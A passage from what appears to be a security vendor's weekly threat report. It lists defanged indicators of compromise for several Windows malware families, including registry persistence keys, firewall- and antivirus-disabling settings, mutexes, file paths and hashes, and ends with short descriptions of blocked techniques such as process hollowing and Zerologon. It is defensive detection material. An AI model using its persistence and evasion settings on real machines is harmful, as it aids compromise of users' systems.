249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 269
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 269
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 269
www[.]google[.]com 269
www[.]instagram[.]com 202
authserver[.]mojang[.]com 129
accounts[.]snapchat[.]com 97
i[.]instagram[.]com 79
b[.]i[.]instagram[.]com 71
app[.]snapchat[.]com 57
sso[.]godaddy[.]com 52
ip[.]pr-cy[.]hacklix[.]com 49
auth[.]api[.]np[.]ac[.]playstation[.]net 43
video-weaver[.]hel01[.]hls[.]ttvnw[.]net 41
native-ps3[.]np[.]ac[.]playstation[.]net 27
csla[.]np[.]community[.]playstation[.]net 26
www[.]google[.]co[.]uk 24
www[.]google[.]fr 18
yandex[.]com 18

*See JSON for more IOCs

Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile 271
%SystemRoot%\SysWOW64\config\systemprofile:.repos 271
%TEMP%\<random, matching '[a-z]{8}'>.exe 257
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 75
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy) 25
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 18
%SystemRoot%\SysWOW64\zsgmltzo 17
%SystemRoot%\SysWOW64\ohvbaiod 15
%SystemRoot%\SysWOW64\rkyedlrg 15
%SystemRoot%\SysWOW64\qjxdckqf 13
%SystemRoot%\SysWOW64\kdrxwekz 13
%SystemRoot%\SysWOW64\exlrqyet 13
%SystemRoot%\SysWOW64\piwcbjpe 12
%SystemRoot%\SysWOW64\gzntsagv 12
%SystemRoot%\SysWOW64\dwkqpxds 12
%SystemRoot%\SysWOW64\ibpvucix 11
%SystemRoot%\SysWOW64\cvjpowcr 11
%SystemRoot%\SysWOW64\unbhgouj 11
%SystemRoot%\SysWOW64\wpdjiqwl 10
%SystemRoot%\SysWOW64\athnmuap 10
%SystemRoot%\SysWOW64\fymsrzfu 10
%SystemRoot%\SysWOW64\buionvbq 10
%System32%\kvmtql\avczyvrs.exe (copy) 1

File Hashes

00acbc3e3a99090c43f2338e905afa15921e87a2d3850d21350e131618f0764d
00d14683fdfbad03ef22a93e8f873a4e3917fda01ea3cd6e23b8e4f93e0021a2
02aa78c912e1a45519b9bb1599a6cc020d9947baffea225eb6d0b418f94c921f
033d5ccd658339872910f9f05126c25370f15df7d7305890d0927f41ca2b7562
062c68419f4f849f514a93bd32c0bf612b93789e1e8db5f45ceb710b63b0f16f
06703e4b14524f14e3a2a1a4de33b87c1517e90233fe2e71f0303c4f983b9d5b
068bf99f5ac3d076a4e8317701b0b638c44afdeb5d57c30349e8614babb13635
06edfc4f5cb04fb6d27b245e5ff79174d7aa6c9482bc0fb1f1ed79be29096132
07d1ec208adcd09b8a8b9a12ae20bf2e4bb88af5374b939e6ae081d2c8e40234
082a95b01c99eda9e48dddca56279d94a226d15c1a7a95b493c062532781c4c4
098dbdd146d1db5536cc94d6fce4b66ac4c7b6cfdb8772d2df20cab9960b69e9
09c56735221939616954e881f453d2a4c29f0d4a02551c94db69eb69e8a0d2af
09cdd86f7bfe44b61a8e50337b28d3b4f99d41d16766302a0a08a17109559a7f
0c96b389bc2da901cdadcf196b387eece711bc5e9020914d4e8e63eaf55ce06c
0d2cd6dbe7b0dec1cabd447a81e1700de2aa99b85867e4ef1dba6db614ff0a99
0fa272906d8b0bda65f7511dd613a7c9c2144388c949a1c80f1ecd02726cd8a6
103a7fe55b3ccfa87bb95ac53a1e640959625f7853ea50b420ec4da60cf5284c
10a3bf15ae07663acba1dcc99a27a4f7d6e85f3b94f60b9bfda256f0a83646d9
10d6de44ff31e0f2d6a04c452729de679adf2ddfb9d47968f22ca6fca575014b
12a6e724d6896e84e649de02e0b70906bc157a475edfe385a389e85372d2bff5
12f193885a086d3737e10f6db885be34d3e81c72ebbd4f22f6f26d78233b8adc
14b570f7c6f11231627b74d13e8a9768b9fe4a4076c4baff231dff0072c28b38
157974b9ca635adaf410b939ef10981085f703b3754df653eae9eedba40c3f72
170d8c90cb7515c2935af76c88c358d2e9c39855ebf546df66f6819686c0d5b6
179087cf99c61c6c5468d741409768ecc466241dc4e7ffa00aca85b0c3a007e9

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.TinyBanker-9877962-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 39 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: F9E7DE7B
39
MutexesOccurrences
F9E7DE7B 39
<random, matching [a-zA-Z0-9]{5,9}> 25
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
216[.]218[.]185[.]162 25
192[.]42[.]116[.]41 8
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
spaines[.]pw 25
vcklmnnejwxx[.]pw 8
uyhgqunqkxnx[.]pw 8
cmnsgscccrej[.]pw 6
mfueeimvyrsp[.]pw 2
evbsdqvgmpph[.]pw 2
Files and or directories createdOccurrences
%HOMEPATH%\AppData\LocalLow\F9E7DE7B 39
%APPDATA%\F9E7DE7B 39
%APPDATA%\F9E7DE7B\bin.exe 39
%APPDATA%\<random, matching '[A-F0-9]{8}'>\bin.exe 25

File Hashes

119d9fc1d777807b1af828bb8a50f7acbe17174985fce653e1e4a3e90e7671d6
11d1b77148d9d822607f681cce0f946ef87482ae79fbef1d6146efd2c59ea97c
16fdbdebf0343488f1016a430558b9c1a7db727d77e8962bc214089a89b39dbd
17f344f0e02e05b25874befbdcea828aafd96765e8d997dc63a1843abaed8203
18b8cd756ba51ab8b165ed309e01e2616c258736103f0c24296595f8f8354ffc
1f6906d9f5c98ef18ab191125139c5be678cad8f550ab265602e878193fed560
29e6d62a734f2d706b85acca57c40d8dc3b90cf2e249150e952a20c195901abd
32968d9468aea7c5b3ac4c636c25320e3f29e01038ba36b062b54fb948a8c011
36ab6c19c537d873398752f73f9518c785c3ed88296e5736c63d60c4cf4872e1
3d3d9f11d98d0c484159bbb39935b67065940645a5be2a1c858d87e9a84eb254
3f94634ec285d9c975b6d1ad7aae6c47c0d3f8347ae6be0a7734d3f8d67dfd87
48a49f3b9b0b781233d2f342f204c7d111fdd37ed41a0a51a644958c8e6cd6dc
4cfc291216f60b2be3299ae16c0e94e0e18ea6a87bded9247c6954c2de0d0975
5028bcb02436f910ba733b8d71eb191844893e537c6b6b6bcfefb50c3cda8f1a
50b5220e6976cb2efd4201c23d81383c72e5b6fb05d51f4a193b49cafef27b00
5a510fa3c6458629a4662a7e45fb0f31064ee6f2df787bb0b220d7640a4a9e5f
5c8d84a555aca0b585540277b95902121ec1b6ab08fbfb6171f8efafb2e0c134
69a64a52a9597cd6ebdfae639d7aa6fbe3363452f2f97dfcdf157113be6608e5
7554b21e8816d62ea89be74c4027092201aecab0c0b4c0055118b7066f7517f4
77d8d19c666b0edfaf538c5d0881b99fe4bbeb1399e3fce2228682e17ab4c8c1
7f4f3f93a33886b5d15b4d54a44538d9d2500a1234a99ee23abd9f44265695da
94f4bfdcb134425a165b615a0eb9ac6e7f57d31afdb4fed2b65498937f9d6ab9
982d9137306728f245c523ad6ce4b2894491e3b9c71d82bfc012d243077adfed
a2b5becd61f46b814dc423b8158f43fa17223b2b05a61f5903f0019051a2b384
a5352a9b585532ec748808ee54b79386cef173ab91ec506732b2efd17d62716e

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella


MITRE ATT&CK


Win.Virus.Xpiro-9877934-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VDS
Value Name: Type
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VDS
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS
Value Name: Type
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WBENGINE
Value Name: Type
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WBENGINE
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMIAPSRV
Value Name: Type
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMIAPSRV
Value Name: Start
15
<HKLM>\SOFTWARE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500 15
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM
Value Name: EnableSmartScreen
15
<HKLM>\SOFTWARE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: EnableNotifications
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ALG
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EHRECVR
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EHSCHED
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FAX
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICROSOFT SHAREPOINT WORKSPACE AUDIT SERVICE
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSDTC
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SNMPTRAP
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMPNETWORKSVC
Value Name: Start
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELL FOLDERS
Value Name: Startup
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\USER SHELL FOLDERS
Value Name: Startup
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FAX
Value Name: ObjectName
15
MutexesOccurrences
Global\mlbjlegc 15
eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 - S-1-5-18 4
Global\Media Center Tuner Request 4
Global\jdjdecjh 1
Global\kfebgdcg 1
Global\fhhfeehg 1
Global\dgefjmfe 1
Global\kajekfjk 1
Global\ghdfjhkd 1
Global\idkkfjla 1
Global\hiifcmdi 1
Global\kcifgedf 1
Global\kcciclkm 1
Global\deelbaab 1
Global\hehmkhfg 1
Global\dbgkfaal 1
Global\ifmefakg 1
Global\eccbmgkf 1
Files and or directories createdOccurrences
%CommonProgramFiles(x86)%\microsoft shared\Source Engine\OSE.EXE 15
%ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE 15
%ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe 15
%ProgramFiles%\Windows Media Player\wmpnetwk.exe 15
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe 15
%SystemRoot%\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe 15
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe 15
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 15
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 15
%System32%\FXSSVC.exe 15
%System32%\UI0Detect.exe 15
%System32%\VSSVC.exe 15
%System32%\alg.exe 15
%System32%\dllhost.exe 15
%System32%\ieetwcollector.exe 15
%System32%\msdtc.exe 15
%System32%\msiexec.exe 15
%System32%\snmptrap.exe 15
%System32%\vds.exe 15
%System32%\wbem\WmiApSrv.exe 15
%System32%\wbengine.exe 15
%SystemRoot%\ehome\ehrecvr.exe 15
%SystemRoot%\ehome\ehsched.exe 15
%SystemRoot%\SysWOW64\dllhost.exe 15
%SystemRoot%\SysWOW64\msiexec.exe 15

*See JSON for more IOCs

File Hashes

33f3bed7ad92f55ec57f15c15840f7ef3619bb840add1f0b1b0bf263ffa3c2d5
3581b9ffe7fb5fae88e018d4385346541e902aa51f60fbf7ba36fffa3e753504
3b9ff2a7d3e13a599c77aa26b6e7671790f86dd5de1db796ac7113f7d25eeb31
87408e5e94812cbaa1aa7bed042093cf7d5ba9a7ff752d2f3bcda842da122cce
93c8ab6bafc8dc3e3e3f47f227b04e38c032b48b44356efec148f045a759cb8d
a1956d58de4ddf4c3cebf3a2375d7bd9e0619f0eee0b0a453211d610aa68f7fa
ad758eb5837ecf5963931a0162b134918b137f53a6486cd1d2c1d8a915a61704
af714c395d907ab8552687fe2808aa921862195cc04396cb3c7af754f6299c54
b394f4b2fa49814c5745eed7017cbc8ee82b39436ffacba543d53c3a668a2e4c
b76a5c6359d6945a8dfb804e5cf569867f736e561604d87e140d465edaea2e8c
c5adb027d800299c9b00a88fcf871c9b69bfb31be4db41b80d9e17d64b41f258
ce1800dd927c7e95afd4a8443939c675bffdd6d7e542e32efcebe7fe83264321
eca2772c431204b2859a2269c6c9a40ca2a5ef05f188c72056cfdc6583f7d54b
f5108637e454ee5c4cc82653579f39eacc90b459cb5d7287950b079d12b0ca3d
f805f4a1bd62d4be86f4d92ce32a8ae6b62cc5e11e248fb569c800ad69ede556

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.DarkComet-9876875-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 31 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\DC3_FEXEC 28
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: UserInit
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicroUpdate
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 24
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN 24
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: StartupKey
22
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
21
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
21
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
21
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN
Value Name: NoControlPanel
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableRegistryTools
21
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION 21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: StartUp
1
MutexesOccurrences
DC_MUTEX-<random, matching [A-Z0-9]{7}> 29
DCPERSFWBP 22
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
185[.]86[.]148[.]81 10
172[.]217[.]10[.]110 3
192[.]169[.]69[.]25 3
23[.]10[.]88[.]237 3
64[.]4[.]54[.]254 3
40[.]91[.]78[.]9 3
23[.]78[.]173[.]83 3
13[.]107[.]246[.]18 3
108[.]61[.]190[.]137 3
13[.]107[.]21[.]200 2
104[.]18[.]10[.]39 2
140[.]82[.]114[.]4 2
185[.]199[.]110[.]133 2
142[.]250[.]123[.]154/31 2
13[.]107[.]246[.]70 2
81[.]147[.]92[.]156 2
54[.]158[.]67[.]235 2
45[.]32[.]150[.]8 2
151[.]101[.]2[.]217 1
151[.]101[.]194[.]217 1
151[.]101[.]66[.]217 1
104[.]18[.]11[.]39 1
172[.]217[.]197[.]102 1
140[.]82[.]112[.]3 1
104[.]23[.]98[.]190 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
thefatskid[.]duckdns[.]org 10
github[.]com 3
c1[.]microsoft[.]com 3
cdn[.]speedcurve[.]com 3
docs[.]microsoft[.]com 3
go[.]microsoft[.]com 3
stats[.]g[.]doubleclick[.]net 3
w[.]usabilla[.]com 3
wcpstatic[.]microsoft[.]com 3
web[.]vortex[.]data[.]microsoft[.]com 3
www[.]bing[.]com 3
www[.]google-analytics[.]com 3
avatars[.]githubusercontent[.]com 3
cacerts[.]digicert[.]com 3
js[.]monitor[.]azure[.]com 3
grinders[.]duckdns[.]org 3
Files and or directories createdOccurrences
%APPDATA%\StartupKey.exe 28
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\<exe name>.log 28
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\msdcsc.exe.log 25
%APPDATA%\dclogs 23
%TEMP%\MSDCSC 13
%TEMP%\MSDCSC\msdcsc.exe 13
%HOMEPATH%\Documents\MSDCSC 11
%HOMEPATH%\Documents\MSDCSC\msdcsc.exe 11
%HOMEPATH%\My Documents\MSDCSC\msdcsc.exe 1
%System32%\MSDCSC\msdcsc.exe 1
%APPDATA%\StartUp.exe 1
%APPDATA%\MSDCSC 1
%APPDATA%\MSDCSC\msdcsc.exe 1
%TEMP%\MSDCSC.exe 1
%HOMEPATH%\Documents\MSDCSC\MicrosoftKey 1
%HOMEPATH%\Documents\Microsoft 1
%HOMEPATH%\Documents\Microsoft\StartUp.exe 1

File Hashes

03db55bf7eb28942620d95b01a4d7581489d822544c0afdd24893a683b13d737
0478ad15b5b6aaf51a0a376a74c0921158d2efec3ab80ea920f4f1e4a1c0e2e0
068893a1822a716352e00edf72c76e3baaf9544d677d6825a4f5c32db5930d4f
0f78bdaf51a5f3f01c1de3d67c9a8f7699a83181395f165b587686d29ed00c5a
15e21b1e2e6f73fc6df2e0cb476dfe243adbc49d287bf469cd09a9551708de6d
185113932619e9540db60b288b329dca8be3d3141b3ca036e42a11d94e272f90
1b11e463f513fa51b1ef69befaf7f834c3eaddc306c4264aacbddad709db5e6c
1d45717c85eaef3937e5ba5d3f1bc8a2877d312f48adfbaa940bb6b41761865a
1f8cfe61a857be5278c46c178638598334ff6b536f76eec2de0e1ea65497f46b
21bc5ae2c0c09d97b1b919b3515d3478f73d015d47039617c1a19c7e23e6593d
23e14fbe0177ba8146e3b7ecbbf6c7c0079a7bb31c12e4c5165cd595f124d1b2
24777db799ccab939742b405de8cd3a371090b609ff13617508cf8ca11605e3a
297f35a63b0ac62de92d65995c40aef8875cddab05093404d3ac87ac7b36944b
2ffb5232668c6daafb3ca10d0f1e198e0ecf05b02af8a502fef6149a75f9aa55
311a9e4018c274e4fee4f648f486c9d05c4e9f6de93f3df1addacc439b0abb85
3677d9c66b970c9ba17c5ad46832b4be94f1309dbeea0b667f8b1f65c1fc1f52
36e7fe8c5250bb831ecb2048aee3ee80281c686f079371b4fbbc38a99e92a143
378ecea25394a9183e414aff4af84f85fc0887646a579c81b60abc61a951c02d
395163a9dff2e38a9e2fcc6993f652d500d8b4cc144e98901141fba92c9953c4
3d2e06ac78e934e9e5d44958c9ba434b26a620ae268a03dc2efb416aaed4d135
3e5f3b246ee8b7825300c1c914ecc49f7938cef5b69810d79dc2e9edb5897c2f
420c401aa21fd7d71e6f36b880200d4510eb3ec79d4c8f7ef0faa7ea3c010da6
42bdee86940264ffb603cedaa3976c0f15389a9870fb95f8d8e8adeb7d0a20d8
44b376ff80de6f475b14f2ffcf709daa50714197835bb504efb8e3b73220adbf
44e3864b868e731b33e0f6c3258af0496e367a1c94730993a78439e7bba79c83

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Hupigon-9876962-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 24 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nrrtvxxz
5
MutexesOccurrences
eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 5
nrrtvxxz.exe 5
QOYEMZYSBHMYXRPRVUNURZTPFFOFKWOP 1
LLDMYBVTBESI@SKVWMMDJPAOTQERPOHB 1
TIAEVGHDGQHFRSBXFJXOXIKNQQLNXURY 1
RLLRFITDSIALICNEHUADZQQFUH@HUOVH 1
@BFPEJRAMTTSNOSXVMCIFOXUFCPRHZEV 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
203[.]205[.]254[.]103 5
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
i[.]qq[.]com 5
user[.]qzone[.]qq[.]com 5
Files and or directories createdOccurrences
%SystemRoot%\nrrtvxxz.exe 5

File Hashes

00aed8bbca1c733cf29cb67c1d05b9f10cb4b2f44b3f88780fc478fc5aed2b79
03b0c0d7138eb07333b6561adb2f8c931a9a5df23773cdc743ac16eee97d2c72
0887cf712624021a19c81f7d56fd7f962a0c81711888f1dfbebc4e8362e4a4d3
0c1f827e80c419173cb9d52ceb62a2e9d1a7388e296ab92d554d82c0ac935339
0fff1aa47eb2da56333fa309de651adf025ff8d80c62c95cddd91a2e88a6dbf1
122a04e621b147df461f23cdc10ff45d877c18a5eb97c64f3a33ff2d713c7139
24925d89fa4f576a7e76aefcf1c58e78cfad728e03d2b6b12d663bcacb1427e5
2e1c1fe7a5c150297ae4a0bda84d89fba054acc8eb1b516be5153fbfe0e9e986
363963520775929cb355a9e6adf0e7f710b4c6ab10e24522563b71e7cb0ec9ec
47740a648c13c4288b829d3d3f2242f1d9730a8af5a907de716871e2590b56a1
4f6c2f4aa94bd6ce1311440e5ff3b70b1dd735269191cce1b6c646ecfc5c0847
608a3f4ac2cefa53738e7aca0a0e5f0530a66984414e9f100f134af4039b47c9
75c4cab4fd1de9ca44db0c3cd51c8d9dfa156ab2205a85924487c10965a12754
79b37f33abb6c24762b75c552ebe9e8e4a65f73d5abc87da06cf4e2a1e399bd0
869f6286a05cabb5b45ee25a84ac2a77b21813fec04d85a585ec4f6133890a58
8db5854db9f3c732edc0d4ef3540b0635848abb70abdfc29049ca25dc4776f07
91fab5bfa3982e9ecc19cb3e82826706cf4c3ada3d3e0d7f0e222affd16aee8d
972507d6a5e780d3428e330fd1df06fc30d90a7a5079b5e22100a46ed4be5e99
a8964c9721dac56c6e77460f82e8c669012d3dbb9ee2629595facc13b1ea744d
bc2183e23a1d6fc2c3f61d89a52d0ffa5f82e691e4fffd9c7363f3c98fdddbe1
bea6048a599c5eed9d491f3b275f03447dd39231cbc76c1efe1cea68c37034aa
d18db2acffcf7dbd5d9ba8a3574b51b9d3d363dde772ab4232c4a59cf38116a5
d6100a3d983ed3af8c27aca8303b0d48b14f1db3729c3458051e1b4b7e5a85b5
d800487b23a227def3770c846e4d8954e777caca74d0d2697c4ee20decaa946e

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (17235)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (4097)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Reverse tcp payload detected - (3203)
An exploit payload intended to connect back to an attacker controlled host using tcp has been detected.
Crystalbit-Apple DLL double hijack detected - (1495)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
CVE-2020-1472 exploit detected - (1299)
An attempt to exploit CVE-2020-1472 has been detected. Also known as "Zerologon". This is a privelege escalation vulnerability in Netlogon.
A Microsoft Office process has started a windows utility. - (707)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many malware different malware campaigns and families.
Dealply adware detected - (635)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Squiblydoo application control bypass attempt detected. - (631)
An attempt to bypass application control via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Kovter injection detected - (164)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
CVE-2019-0708 detected - (83)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.